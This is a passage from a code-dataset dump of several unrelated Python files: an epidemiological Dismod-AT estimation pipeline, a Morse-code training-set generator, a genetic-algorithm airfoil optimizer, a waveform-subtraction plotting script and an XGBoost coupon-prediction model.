convert_gbd_ids_to_dismod_values\nfrom cascade.input_data.configuration.construct_mortality import get_raw_csmr, normalize_csmr\nfrom cascade.input_data.configuration.id_map import make_integrand_map\nfrom cascade.input_data.db.asdr import asdr_as_fit_input\nfrom cascade.input_data.db.country_covariates import country_covariate_set\nfrom cascade.input_data.db.locations import (\n location_hierarchy, location_hierarchy_to_dataframe, all_locations_with_these_parents\n)\nfrom cascade.input_data.db.study_covariates import get_study_covariates\nfrom cascade.model import ObjectWrapper\nfrom cascade.model.integrands import make_average_integrand_cases_from_gbd\nfrom cascade.saver.save_prediction import save_predicted_value, uncertainty_from_prediction_draws\n\nCODELOG, MATHLOG = getLoggers(__name__)\n\n\ndef retrieve_data(execution_context, local_settings, included_locations, covariate_data_spec):\n \"\"\"Gets data from the outside world.\"\"\"\n data = SimpleNamespace()\n data_access = local_settings.data_access\n model_version_id = data_access.model_version_id\n\n data.locations = location_hierarchy(\n data_access.gbd_round_id, location_set_version_id=data_access.location_set_version_id)\n\n if data_access.bundle_file:\n data.bundle = normalized_bundle_from_disk(data_access.bundle_file)\n else:\n data.bundle = normalized_bundle_from_database(\n execution_context,\n model_version_id,\n bundle_id=local_settings.data_access.bundle_id,\n tier=local_settings.data_access.tier\n )\n CODELOG.debug(f\"Bundle length {len(data.bundle)} \")\n # Study covariates will have columns {\"bundle_id\", \"seq\", \"study_covariate_id\"}.\n if data_access.bundle_study_covariates_file:\n data.sparse_covariate_data = dataframe_from_disk(data_access.bundle_study_covariates_file)\n else:\n mvid = data_access.model_version_id\n data.sparse_covariate_data = get_study_covariates(\n execution_context, data_access.bundle_id, mvid, tier=data_access.tier)\n\n 
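# Editorial sketch (not part of the original source): the study-covariate frame fetched above is long-format with columns {\"bundle_id\", \"seq\", \"study_covariate_id\"}; a minimal, assumption-laden sketch of widening it to one 0/1 indicator column per covariate, using only standard pandas calls, would be:\n #     wide = (data.sparse_covariate_data.assign(value=1)\n #             .pivot_table(index=\"seq\", columns=\"study_covariate_id\",\n #                          values=\"value\", fill_value=0))\n 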
country_covariate_ids = {\n spec.covariate_id for spec in covariate_data_spec\n if spec.study_country == \"country\"\n }\n data.study_id_to_name, data.country_id_to_name = find_covariate_names(\n execution_context, covariate_data_spec)\n assign_epiviz_covariate_names(\n data.study_id_to_name, data.country_id_to_name, covariate_data_spec\n )\n\n # Raw country covariate data. Must be subset for children.\n covariates_by_age_id = country_covariate_set(\n country_covariate_ids,\n demographics=dict(age_group_ids=\"all\", year_ids=\"all\", sex_ids=\"all\",\n location_ids=list(data.locations.nodes)),\n gbd_round_id=data_access.gbd_round_id,\n decomp_step=data_access.decomp_step,\n )\n # Every age group defined, so that we can search for what's given.\n all_age_spans = age_spans.get_age_spans()\n data.country_covariates = dict()\n for covariate_id, covariate_df in covariates_by_age_id.items():\n ccov_ranges_df = convert_gbd_ids_to_dismod_values(covariate_df, all_age_spans)\n data.country_covariates[covariate_id] = ccov_ranges_df\n\n data.country_covariates_binary = check_binary_covariates(execution_context, country_covariate_ids)\n\n # Standard GBD age groups with IDs, start, finish.\n data.ages_df = db_queries.get_age_metadata(\n age_group_set_id=data_access.age_group_set_id,\n gbd_round_id=data_access.gbd_round_id\n )\n # Returns a dictionary of demographic IDs.\n data.years_df = db_queries.get_demographics(\n gbd_team=\"epi\", gbd_round_id=data_access.gbd_round_id)[\"year_id\"]\n\n # This comes in yearly from 1950 to 2018\n # Must be subset for children.\n mortality_locations = all_locations_with_these_parents(\n data.locations, included_locations\n )\n all_sexes = [1, 2, 3]\n data.age_specific_death_rate = asdr_as_fit_input(\n data_access.location_set_version_id,\n mortality_locations,\n all_sexes,\n data_access.gbd_round_id,\n data_access.decomp_step,\n data.ages_df,\n with_hiv=data_access.with_hiv\n )\n data.cause_specific_mortality_rate = get_raw_csmr(\n execution_context, local_settings.data_access,\n mortality_locations, all_age_spans)\n\n return data\n\n\ndef modify_input_data(input_data, local_settings):\n \"\"\"Transforms data to input for model.\"\"\"\n ev_settings = local_settings.settings\n # These are suitable for input to the fit.\n if not ev_settings.eta.is_field_unset(\"data\") and ev_settings.eta.data:\n data_eta = defaultdict(lambda: float(ev_settings.eta.data))\n else:\n data_eta = defaultdict(lambda: nan)\n id_to_integrand = make_integrand_map()\n for set_eta in ev_settings.data_eta_by_integrand:\n data_eta[id_to_integrand[set_eta.integrand_measure_id]] = float(set_eta.value)\n\n if not ev_settings.model.is_field_unset(\"data_density\") and ev_settings.model.data_density:\n density = defaultdict(lambda: ev_settings.model.data_density)\n else:\n density = defaultdict(lambda: \"gaussian\")\n for set_density in ev_settings.data_density_by_integrand:\n density[id_to_integrand[set_density.integrand_measure_id]] = set_density.value\n\n csmr = normalize_csmr(input_data.cause_specific_mortality_rate, local_settings.sexes)\n CODELOG.debug(f\"bundle cols {input_data.bundle.columns}\\ncsmr cols {csmr.columns}\")\n assert not set(csmr.columns) - set(input_data.bundle.columns)\n bundle_with_added = pd.concat([input_data.bundle, csmr], sort=False)\n bundle_without_excluded = strip_bundle_exclusions(bundle_with_added, ev_settings)\n nu = defaultdict(lambda: nan)\n nu[\"students\"] = local_settings.settings.students_dof.data\n nu[\"log_students\"] = 
local_settings.settings.log_students_dof.data\n\n # These observations still have a seq column.\n input_data.observations = bundle_to_observations(\n bundle_without_excluded,\n local_settings.parent_location_id,\n data_eta,\n density,\n nu,\n )\n # ev_settings.data_eta_by_integrand is a dummy in form.py.\n MATHLOG.info(f\"Ignoring data_eta_by_integrand\")\n\n input_data.locations_df = location_hierarchy_to_dataframe(input_data.locations)\n return input_data\n\n\ndef one_location_data_from_global_data(global_data, local_settings):\n \"\"\"\n Responsible for localizing global data to this location and its children.\n The global data has been saved, for all locations, earlier. This\n looks at settings and subselects that data.\n\n Args:\n global_data (SimpleNamespace): A bag of data.\n local_settings (SimpleNamespace): Settings that have been build\n for this location.\n\n Returns:\n SimpleNamespace: The same object, but data is modified.\n \"\"\"\n include_birth_prevalence = local_settings.settings.model.birth_prev\n # Make avgints here b/c they are wrote and not worth saving.\n global_data.average_integrand_cases = \\\n make_average_integrand_cases_from_gbd(\n global_data.ages_df,\n global_data.years_df,\n local_settings.sexes,\n local_settings.children,\n include_birth_prevalence\n )\n add_covariate_data_to_observations_and_avgints(global_data, local_settings, global_data.covariate_data_spec)\n global_data.observations = global_data.observations.drop(columns=[\"sex_id\", \"seq\"])\n set_sex_reference(global_data.covariate_data_spec, local_settings)\n\n # These are the draws as output of the parent location. Called draws.\n global_data.draws = None\n\n # The parent can also supply integrands as a kind of prior.\n # These will be shaped like input measurement data. Called fit-integrands.\n global_data.integrands = None\n return global_data\n\n\ndef set_sex_reference(covariate_data_spec, local_settings):\n \"\"\"The sex covariate holds out data for the sex by setting the ``reference``\n and ``max_difference``. If sex is 1, then set reference to 0.5 and max\n difference to 0.75. If sex is 2, reference is -0.5. 
If it's 3 or 4,\n then reference is 0.\"\"\"\n sex_covariate = [sc_sex for sc_sex in covariate_data_spec\n if sc_sex.covariate_id == 0 and sc_sex.transformation_id == 0]\n if sex_covariate:\n sex_assignments_to_exclude_by_value = {\n (1,): [0.5, 0.25],\n (2,): [-0.5, 0.25],\n (3,): [0.0, 0.25],\n (1, 3): [0.5, 0.75],\n (2, 3): [-0.5, 0.75],\n (1, 2, 3): [0.0, 0.75],\n }\n reference, max_difference = sex_assignments_to_exclude_by_value[tuple(sorted(local_settings.sexes))]\n sex_covariate[0].reference = reference\n sex_covariate[0].max_difference = max_difference\n\n\ndef compute_parent_fit_fixed(execution_context, db_path, local_settings, input_data, model):\n \"\"\"\n\n Args:\n execution_context:\n input_data: These include observations and initial guess.\n model (Model): A complete Model object.\n\n Returns:\n The fit.\n \"\"\"\n begin = timer()\n dismod_objects = ObjectWrapper(str(db_path))\n dismod_objects.locations = input_data.locations_df\n dismod_objects.parent_location_id = model.location_id\n dismod_objects.model = model\n dismod_objects.set_option(**make_options(local_settings.settings, local_settings.model_options))\n for integrand_name, value in make_minimum_meas_cv(local_settings.settings).items():\n dismod_objects.set_minimum_meas_cv(integrand_name, value)\n if not local_settings.run.db_only:\n dismod_objects.run_dismod(\"init\")\n stdout, stderr, _metrics = dismod_objects.run_dismod([\"fit\", \"fixed\"])\n CODELOG.debug(stdout)\n CODELOG.debug(stderr)\n else:\n dismod_objects.run_dismod(\"init\")\n MATHLOG.info(f\"Ran with db_only so not running dismod fit fixed on {db_path}.\")\n CODELOG.info(f\"fit fixed {timer() - begin}\")\n\n\ndef compute_parent_fit(execution_context, db_path, local_settings, simulate_idx=None):\n \"\"\"\n\n Args:\n execution_context:\n input_data: These include observations and initial guess.\n model (Model): A complete Model object.\n simulate_idx (int): Which simulation to fit.\n\n Returns:\n The fit.\n \"\"\"\n begin = timer()\n dismod_objects = ObjectWrapper(str(db_path))\n dismod_objects.set_option(**make_options(local_settings.settings, local_settings.model_options))\n fit_var = dismod_objects.fit_var\n dismod_objects.start_var = fit_var\n dismod_objects.scale_var = fit_var\n\n if not local_settings.run.db_only:\n dismod_objects.run_dismod(\"init\")\n command = [\"fit\", \"both\"]\n if simulate_idx is not None:\n command += [simulate_idx]\n stdout, stderr, _metrics = dismod_objects.run_dismod(command)\n CODELOG.debug(stdout)\n CODELOG.debug(stderr)\n else:\n dismod_objects.run_dismod(\"init\")\n MATHLOG.info(f\"Ran with db_only so not running dismod fit both on {db_path}.\")\n CODELOG.info(f\"fit fixed {timer() - begin}\")\n\n dismod_objects.avgint = None # Need to make an avgint table.\n dismod_objects.truth_var = dismod_objects.fit_var\n dismod_objects.run_dismod([\"predict\", \"truth_var\"])\n\n draw_cnt = local_settings.number_of_fixed_effect_samples\n dismod_objects.run_dismod([\"simulate\", str(draw_cnt)])\n\n\ndef gather_simulations_and_fit(fit_path, simulation_paths):\n predictions = list()\n for draw_path in simulation_paths:\n draw_objects = ObjectWrapper(str(draw_path))\n predicted, not_predicted = draw_objects.predict\n predictions.append(predicted)\n draw_objects.close()\n\n fit_objects = ObjectWrapper(str(fit_path))\n pred_fit, not_pred_fit = fit_objects.predict\n fit_objects.close()\n return pred_fit, predictions\n\n\ndef save_outputs(\n computed_fit, predictions, execution_context, local_settings, summary_path\n):\n predictions = 
uncertainty_from_prediction_draws(computed_fit, predictions)\n save_predicted_value(\n execution_context, predictions, \"fit\", summary_path, local_settings.run.no_upload\n )\n\n\ndef fit_and_predict_fixed_effect_sample(db_path, draw_idx):\n dismod_objects = ObjectWrapper(str(db_path))\n # -1 because we are using 1-based draw index and Dismod-AT is zero-based.\n dismod_objects.run_dismod([\"fit\", str(draw_idx - 1)])\n dismod_objects.avgint = None # Need to make an avgint table.\n dismod_objects.truth_var = dismod_objects.fit_var\n dismod_objects.run_dismod([\"predict\"])\n","sub_path":"src/cascade/executor/estimate_location.py","file_name":"estimate_location.py","file_ext":"py","file_size_in_byte":13427,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"197901606","text":"import random\n\nnletters = 26\nrunning_output = False\ncode_conversions = [None] * 27\n\ncode_conversions[1] = \".-\" # A 2 4 (5)\ncode_conversions[2] = \"-...\" # B 4 8 (9)\ncode_conversions[3] = \"-.-.\" # C 4 9 (11)\ncode_conversions[4] = \"-..\" # D 3 6 (7)\ncode_conversions[5] = \".\" # E 1 1 (1)\ncode_conversions[6] = \"..-.\" # F 4 8 (9)\ncode_conversions[7] = \"--.\" # G 3 7 (9)\ncode_conversions[8] = \"....\" # H 4 7 (7)\ncode_conversions[9] = \"..\" # I 2 3 (3)\ncode_conversions[10] = \".---\" # J 4 10 (13)\ncode_conversions[11] = \"-.-\" # K 3 7 (9)\ncode_conversions[12] = \".-..\" # L 4 8 (9)\ncode_conversions[13] = \"--\" # M 2 5 (7)\ncode_conversions[14] = \"-.\" # N 2 4 (5)\ncode_conversions[15] = \"---\" # O 3 8 (11)\ncode_conversions[16] = \".--.\" # P 4 9 (11)\ncode_conversions[17] = \"--.-\" # Q 4 10 (13)\ncode_conversions[18] = \".-.\" # R 3 6 (7)\ncode_conversions[19] = \"...\" # S 3 5 (5)\ncode_conversions[20] = \"-\" # T 1 2 (3)\ncode_conversions[21] = \"..-\" # U 3 6 (7)\ncode_conversions[22] = \"...-\" # V 4 8 (9)\ncode_conversions[23] = \".--\" # W 3 7 (9)\ncode_conversions[24] = \"-..-\" # X 4 9 (11)\ncode_conversions[25] = \"-.--\" # Y 4 10 (13)\ncode_conversions[26] = \"--..\" # Z 4 9 (11)\n\n\ndef random_string(length, chars_used=\"ABCDEFGHIJKLMNOPQRSTUVWXYZ\"):\n \"\"\"Returns a random string of length length using only the characters present\n in the string chars_used; removes duplicates so each character has equal\n probability of being chosen\"\"\"\n chars_used = list(set(chars_used.upper()))\n s = [None] * length\n for i in range(length):\n s[i] = random.choice(chars_used)\n return ''.join(s)\n\n\ndef string_to_code(s):\n \"\"\"Given a string of characters, S returns three values: a vector of input\n patterns in the proper morse-code representation, a corresponding vector\n of output patterns, and a vector of break values with a T at the start of\n each new character.\"\"\"\n inlist = []\n outlist = []\n breaklist = []\n for i in range(len(s)):\n c = ord(s[i]) - 64\n morse = code_conversions[c]\n outpat = [-0.5] * (nletters + 1)\n strobepat = [-0.5] * (nletters + 1)\n if (running_output):\n outpat[c] = 0.5\n strobepat[0] = 0.5\n strobepat[c] = 0.5\n for j in range(len(morse)):\n if (morse[j] == '.'):\n inlist = [[-0.5], [0.5]] + inlist\n outlist = [outpat[:], outpat[:]] + outlist\n breaklist = [False, (j == 0)] + breaklist\n else:\n inlist = [[-0.5], [0.5], [0.5]] + inlist\n outlist = [outpat[:], outpat[:], outpat[:]] + outlist\n breaklist = [False, False, (j == 0)] + breaklist\n outlist = [strobepat[:]] + outlist\n inlist = [[-0.5]] + inlist\n breaklist = [False] + breaklist\n\n inlist.reverse()\n outlist.reverse()\n 
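# Editorial comment (not in the original source): the three lists were built back-to-front by prepending, so each is reversed here to restore input order.\n 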
breaklist.reverse()\n return (inlist, outlist, breaklist)\n\ntraining_string = None\ntest_string = None\n\ndef build_morse(s, continuing=False):\n \"\"\"Given a string of characters, create a training set for the morse code\n representation of the string. There is no test set. If CONTINUE is on,\n make use of pre-existing hidden units.\"\"\"\n global training_string, training_inputs, training_outputs, training_breaks, use_training_breaks, test_inputs, \\\n test_outputs, test_breaks, test_string, \\\n use_test_breaks, ninputs, noutputs, nletters\n\n training_string = s\n (inputs, outputs, breaks) = string_to_code(s)\n training_inputs = inputs\n training_outputs = outputs\n training_breaks = breaks\n use_training_breaks = True\n test_inputs = training_inputs\n test_outputs = training_outputs\n test_breaks = training_breaks\n test_string = None\n use_test_breaks = True\n ninputs = 1\n noutputs = nletters + 1\n if continuing:\n changed_training_set()\n # build_net(ninputs, noutputs)\n # init_net()\n print(f'Training on {s}')\n\n\n\n\nbuild_morse(\"ABCDEFGHIJKLMNOPQRSTUVWXYZ\")\n\n","sub_path":"Cascor-NumPy/datasets/morse.py","file_name":"morse.py","file_ext":"py","file_size_in_byte":4360,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"545669408","text":"\"\"\"Optimize wing section for a given planform and flight condition.\"\"\"\n\nimport random\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\nimport matplotlib.font_manager as font_manager\n\nfrom deap import base\nfrom deap import creator\nfrom deap import tools\nfrom deap import algorithms\n\nfrom ambiance import Atmosphere\n\nfrom aerodynamics_toolbox import interpolate_airfoil_polar\nfrom aerodynamics_toolbox import get_3D_aerodynamics\nfrom aerodynamics_toolbox import runXfoil\n\nfrom aircraft_plotter import naca_4_series\nfrom aircraft_plotter import create_VSP_wing\n\nsns.set_theme(style='darkgrid', font='Palatino Linotype', context='paper')\nFONT_FILE = 'C:/Windows/Fonts/pala.ttf'\nfont_manager.fontManager.addfont(FONT_FILE)\n\n\n# %% Problem constants\n\nH = 640 # m AMSL\nV = 22 # m/s\ng = Atmosphere(H).grav_accel[0] # m/s^2\nrho = Atmosphere(H).density[0] # kg/m^3\nnu = Atmosphere(H).kinematic_viscosity[0] # m^2/s\n\nWL = 23.239 # kg/m^2\nW0 = 10 # kg\nAR = 11\n\n# planform = [0.344, 0.329, 0.232, 0.2] # 6 sections\n# planform = [0.34, 0.338, 0.303, 0.202, 0.2] # 8 sections\nplanform = [0.252, 0.236, 0.186, 0.1] # 10 sections\nn_sections = 6\n\nmax_camber_min = 0 # %\nmax_camber_max = 6 # %\nmax_camber_loc_min = 2 # 10%\nmax_camber_loc_max = 6 # 10%\nmax_tc_min = 13 # %\nmax_tc_max = 25 # %\n\nS_ideal = W0/WL # m^2\nb = round(np.sqrt(AR*S_ideal), 2) # m\ndy = b/n_sections # m\ny_stations = np.linspace(0, b/2, n_sections//2 + 1) # m\nc_array = np.array(planform)\nS_array = (c_array[:-1] + c_array[1:])/2*dy\n\nS_real = 2*np.sum(S_array)\nMGC = round(np.sum((c_array[:-1] + c_array[1:])/2*S_array)/(S_real/2), 3)\n\nLambda_midc = np.sum(np.arctan(\n (c_array[1:] - c_array[0:-1])/(4*dy))*S_array)/S_real\n\nL = W0*g\nCL = round(L/(0.5*rho*V**2*S_real), 4)\n\nLr = L/(np.pi/4*b)\ncl_r = round(2*Lr/(rho*V**2*c_array[0]), 4)\nRe = (V*MGC)/nu\n\n# %% GA - Airfoil\n\n\ndef optimize_airfoil(population_size, max_generations, p_crossover,\n p_mutation):\n \"\"\"Airfoil optimization algorithm.\"\"\"\n hall_of_fame_size = 1\n\n toolbox = base.Toolbox()\n\n # Create fitness function class\n creator.create('FitnessMin', base.Fitness, weights=(-1.0,))\n\n # Create 
individual class\n creator.create('Individual', list, fitness=creator.FitnessMin)\n\n # Random wing sections generator\n def get_airfoil(y_stations):\n\n max_camber = round(random.randint(max_camber_min, max_camber_max), 0)\n max_camber_loc = round(random.randint(max_camber_loc_min,\n max_camber_loc_max), 0)\n max_tc = round(random.randint(max_tc_min, max_tc_max), 0)\n\n return [max_camber, max_camber_loc, max_tc]\n\n toolbox.register('generate_airfoil', get_airfoil, y_stations)\n\n # Create individual generator\n toolbox.register('individual_creator', tools.initIterate,\n creator.Individual, toolbox.generate_airfoil)\n\n # Create population generator\n toolbox.register('population_creator', tools.initRepeat, list,\n toolbox.individual_creator)\n\n # Fitness evaluation\n def get_wing_CDp(individual):\n\n alpha_array, cl_array, cd_array = interpolate_airfoil_polar(individual,\n Re)\n\n CDp = get_3D_aerodynamics(AR, Lambda_midc, cl_r, alpha_array, cl_array,\n cd_array)[-1]\n\n return CDp,\n\n # Define geneitc operators\n toolbox.register('evaluate', get_wing_CDp)\n toolbox.register('select', tools.selTournament, tournsize=6)\n # toolbox.register('mate', tools.cxSimulatedBinaryBounded,\n # low=(max_camber_min, max_camber_loc_min,\n # max_tc_min),\n toolbox.register('mate', tools.cxUniform, indpb=1/3)\n toolbox.register('mutate', tools.mutUniformInt,\n low=(max_camber_min, max_camber_loc_min, max_tc_min),\n up=(max_camber_max, max_camber_loc_max, max_tc_max),\n indpb=1/3)\n\n population = toolbox.population_creator(n=population_size)\n\n stats = tools.Statistics(lambda ind: ind.fitness.values)\n stats.register('min', np.min)\n stats.register('avg', np.mean)\n\n hof = tools.HallOfFame(hall_of_fame_size)\n\n population, logbook = algorithms.eaSimple(population, toolbox,\n cxpb=p_crossover,\n mutpb=p_mutation,\n ngen=max_generations,\n stats=stats, halloffame=hof,\n verbose=True)\n\n minFitnessValues, meanFitnessValues = logbook.select(\"min\", \"avg\")\n\n fig = plt.figure(dpi=1200)\n ax = fig.add_subplot(111)\n ax.plot(minFitnessValues, color='red', label='Min FV')\n ax2 = ax.twinx()\n ax2.plot(meanFitnessValues, color='green', label='Mean FV')\n ax.set_xlabel('Generation')\n ax.set_ylabel(r'$\\mathdefault{Minimum C_{D_{p}}}$')\n ax2.set_ylabel(r'Average $\\mathdefault{C_{D_{p}}}$')\n ax.set_xlim(left=0)\n\n# hof_file = open('airfoil_hof.txt', 'w')\n for i in range(hall_of_fame_size):\n max_cam = hof.items[i][0]\n max_cam_loc = hof.items[i][1]\n max_tc = hof.items[i][2]\n\n airfoil_name = ('NACA({0:.2f})({1:.2f})({2:.2f})'.format(\n max_cam, max_cam_loc, max_tc))\n\n naca_4_series(max_cam, max_cam_loc, max_tc, 100, plot_switch=True)\n alpha_array, cl_array, cd_array = runXfoil(airfoil_name, Re, -10, 10,\n 0.25)\n\n# CDp = hof.items[i].fitness.values[0]\n alpha_i = get_3D_aerodynamics(AR, Lambda_midc, cl_r, alpha_array,\n cl_array, cd_array)[0]\n\n # hof_file.write(airfoil_name + '\\t\\t')\n # hof_file.write('{0}\\t\\t'.format(CDp))\n # hof_file.write('{0}\\n'.format(alpha_i))\n\n if i == 0:\n best_airfoil = hof.items[i]\n best_alpha_i = alpha_i\n # hof_file.close()\n\n return best_airfoil, best_alpha_i\n\n\ndef main():\n\n airfoil, alpha_i = optimize_airfoil(50, 20, 0.5, 0.95)\n create_VSP_wing(b, planform, airfoil, alpha_i)\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"2 - Conceptual Design/4 - Wing 
Design/airfoil_optimization.py","file_name":"airfoil_optimization.py","file_ext":"py","file_size_in_byte":6285,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"521910857","text":"import matplotlib.pyplot as plt\nfrom matplotlib.ticker import EngFormatter\n\nimport sqlite3\nimport numpy as np\n\nfrom event_plotter.event_plotter import EventPlotter\nfrom event_analysis.event_analysis import EventAnalysis\n\n\ndef run(signal_period, test_trigid_list, temps_avant, temps_apres):\n\n for test_trigid in test_trigid_list:\n one_amplitude(signal_period, test_trigid, temps_avant, temps_apres)\n\n\ndef one_amplitude(signal_period, test_trigid, temps_avant, temps_apres):\n\n db_path = r\"/Users/gabrielduran/Trabajo/events_scripts/samples/RUN010_sample.sqlite\"\n\n db_con = sqlite3.connect(db_path)\n\n # test_trigid = 114733978\n\n channel = 2\n\n tester = \"STB029\"\n\n MyPlotter = EventPlotter()\n Analyst = EventAnalysis()\n\n # ax, *_ = MyPlotter.plot_single_event(test_trigid, channel, tester, 0, db_con=db_con)\n\n fig, axes = plt.subplots(3, 1)\n\n y1, t1 = Analyst.get_event_value_and_time(db_con, test_trigid, channel, tester)\n\n # signal_period = 1.6666e-6\n\n n_samples = len(y1)\n\n decalage_samples = n_samples - len(np.where(t1 > t1[0] + signal_period)[0])\n\n new_n_samples = n_samples + decalage_samples\n\n t2 = np.zeros(new_n_samples)\n\n extra_times = (t1[1] - t1[0]) * np.array(list(range(int(decalage_samples)))) + t1[-1]\n\n t2[n_samples:] = extra_times\n t2[:n_samples] = t1\n\n y2 = np.zeros(new_n_samples)\n y2[decalage_samples:] = y1\n\n y3 = np.append(y2[:-decalage_samples] - y1, y2[-decalage_samples:])\n\n marker = \"x\"\n markersize = 0.2\n\n axes[0].scatter(t1, y1, marker=marker, linewidths=markersize)\n axes[1].scatter(t2, y2, marker=marker, linewidths=markersize)\n axes[2].scatter(t2, y3, marker=marker, linewidths=markersize)\n\n for ax in axes:\n ax.xaxis.set_major_formatter(EngFormatter(unit=\"s\"))\n\n error_zone = np.where(t2 > temps_avant)\n error_zone_2 = np.where(t2[error_zone] < temps_apres) + error_zone[0][0] - 1\n\n error_y = y3[error_zone_2[0]]\n error_t = t2[error_zone_2[0]]\n\n for index, ax in enumerate(axes):\n if index in [0,1]:\n ax.set_xlim(left=t1.min(), right=t1.max())\n\n else:\n ax.set_xlim(left=temps_avant, right=temps_apres)\n\n plt.plot(error_t, error_y, c='r')\n\n my_min = error_y.min()\n my_max = error_y.max()\n\n print(\"min: \" + str(my_min) + \"; max: \" + str(my_max) + \"; amplitude: \" + str(my_max - my_min))\n\n fig.suptitle(\"Trigid: \" + str(test_trigid))\n\n plt.show()\n\n\ntest_trigid_list = [89237587] # , 114733974, 114734005, 114734051]\n\nsignal_period = 1.6666e-6\nrun(signal_period, test_trigid_list, temps_avant=-signal_period*0.6, temps_apres=signal_period*0.6)\n","sub_path":"soustraire_courbes.py","file_name":"soustraire_courbes.py","file_ext":"py","file_size_in_byte":2640,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"46984225","text":"import datetime\r\nimport os\r\n\r\nimport pandas as pd\r\nimport numpy as np\r\nimport xgboost as xgb\r\nfrom sklearn.preprocessing import MinMaxScaler\r\nfrom sklearn.metrics import auc, roc_curve\r\n\r\n\r\ndef get_processed_data():\r\n dataset1 = pd.read_csv('data_preprocessed_3/ProcessDataSet1.csv')\r\n dataset2 = pd.read_csv('data_preprocessed_3/ProcessDataSet2.csv')\r\n dataset3 = pd.read_csv('data_preprocessed_3/ProcessDataSet3.csv')\r\n\r\n dataset1.drop_duplicates(inplace=True)\r\n 
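# Aside: the soustraire_courbes.py record above cancels a periodic waveform by
# zero-padding it with one period's worth of samples (decalage_samples) and
# subtracting the original from the delayed copy. A minimal sketch of the same
# idea; every name below is illustrative and not taken from that script.
import numpy as np

sr, f = 44100.0, 441.0                 # sample rate and test-tone frequency
y = np.sin(2 * np.pi * f * np.arange(4410) / sr)  # 0.1 s periodic test signal
period = int(round(sr / f))            # 100 samples per period at 441 Hz
delayed = np.concatenate([np.zeros(period), y])   # copy shifted by one period
residual = delayed[:len(y)] - y        # ~0 once the delay is filled in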
dataset2.drop_duplicates(inplace=True)\r\n dataset3.drop_duplicates(inplace=True)\r\n\r\n dataset12 = pd.concat([dataset1, dataset2], axis=0)\r\n\r\n dataset12.fillna(0, inplace=True)\r\n dataset3.fillna(0, inplace=True)\r\n\r\n return dataset12, dataset3\r\n\r\n\r\ndef train_xgb(dataset12, dataset3):\r\n predict_dataset = dataset3[['User_id', 'Coupon_id', 'Date_received']].copy()\r\n predict_dataset.Date_received = pd.to_datetime(predict_dataset.Date_received, format='%Y-%m-%d')\r\n predict_dataset.Date_received = predict_dataset.Date_received.dt.strftime('%Y%m%d')\r\n\r\n # 将数据转化为dmatric格式\r\n dataset12_x = dataset12.drop(\r\n columns=['User_id', 'Merchant_id', 'Discount_rate', 'Date_received', 'discount_rate_x', 'discount_rate_y',\r\n 'Date', 'Coupon_id', 'label'], axis=1)\r\n dataset3_x = dataset3.drop(\r\n columns=['User_id', 'Merchant_id', 'Discount_rate', 'Date_received', 'discount_rate_x', 'discount_rate_y',\r\n 'Coupon_id'], axis=1)\r\n\r\n train_dmatrix = xgb.DMatrix(dataset12_x, label=dataset12.label)\r\n predict_dmatrix = xgb.DMatrix(dataset3_x)\r\n\r\n # xgboost模型训练\r\n params = {'booster': 'gbtree',\r\n 'objective': 'binary:logistic',\r\n 'eval_metric': 'auc',\r\n 'gamma': 0.1,\r\n 'min_child_weight': 1.1,\r\n 'max_depth': 5,\r\n 'lambda': 10,\r\n 'subsample': 0.7,\r\n 'colsample_bytree': 0.7,\r\n 'colsample_bylevel': 0.7,\r\n 'eta': 0.02,\r\n # 'tree_method': 'gpu_hist',\r\n # 'gpu_id': '1',\r\n # 'n_gpus': '-1',\r\n 'seed': 0,\r\n 'nthread': cpu_jobs,\r\n # 'predictor': 'gpu_predictor'\r\n }\r\n\r\n # 使用xgb.cv优化num_boost_round参数\r\n cvresult = xgb.cv(params, train_dmatrix, num_boost_round=10000, nfold=2, metrics='auc', seed=0, callbacks=[\r\n xgb.callback.print_evaluation(show_stdv=False),\r\n xgb.callback.early_stop(40)\r\n ])\r\n num_round_best = cvresult.shape[0] - 1\r\n print('Best round num: ', num_round_best)\r\n\r\n # 使用优化后的num_boost_round参数训练模型\r\n watchlist = [(train_dmatrix, 'train')]\r\n model = xgb.train(params, train_dmatrix, num_boost_round=num_round_best, evals=watchlist)\r\n\r\n model.save_model('train_dir_2/xgbmodel4')\r\n params['predictor'] = 'cpu_predictor'\r\n model = xgb.Booster(params)\r\n model.load_model('train_dir_2/xgbmodel4')\r\n\r\n # predict test set\r\n dataset3_predict = predict_dataset.copy()\r\n dataset3_predict['label'] = model.predict(predict_dmatrix)\r\n\r\n # 标签归一化\r\n dataset3_predict.label = MinMaxScaler(copy=True, feature_range=(0, 1)).fit_transform(\r\n dataset3_predict.label.values.reshape(-1, 1))\r\n dataset3_predict.sort_values(by=['Coupon_id', 'label'], inplace=True)\r\n dataset3_predict.to_csv(\"train_dir_2/xgb_preds_6.csv\", index=None, header=None)\r\n print(dataset3_predict.describe())\r\n\r\n # 在dataset12上计算auc\r\n # model = xgb.Booster()\r\n # model.load_model('train_dir_2/xgbmodel')\r\n\r\n temp = dataset12[['Coupon_id', 'label']].copy()\r\n temp['pred'] = model.predict(xgb.DMatrix(dataset12_x))\r\n temp.pred = MinMaxScaler(copy=True, feature_range=(0, 1)).fit_transform(temp['pred'].values.reshape(-1, 1))\r\n print(myauc(temp))\r\n\r\n\r\n# 性能评价函数\r\ndef myauc(test):\r\n testgroup = test.groupby(['Coupon_id'])\r\n aucs = []\r\n for i in testgroup:\r\n tmpdf = i[1]\r\n if len(tmpdf['label'].unique()) != 2:\r\n continue\r\n fpr, tpr, thresholds = roc_curve(tmpdf['label'], tmpdf['pred'], pos_label=1)\r\n aucs.append(auc(fpr, tpr))\r\n return np.average(aucs)\r\n\r\n\r\nif __name__ == '__main__':\r\n start = datetime.datetime.now()\r\n print(start.strftime('%Y-%m-%d %H:%M:%S'))\r\n # log = '%s\\n' % start.strftime('%Y-%m-%d 
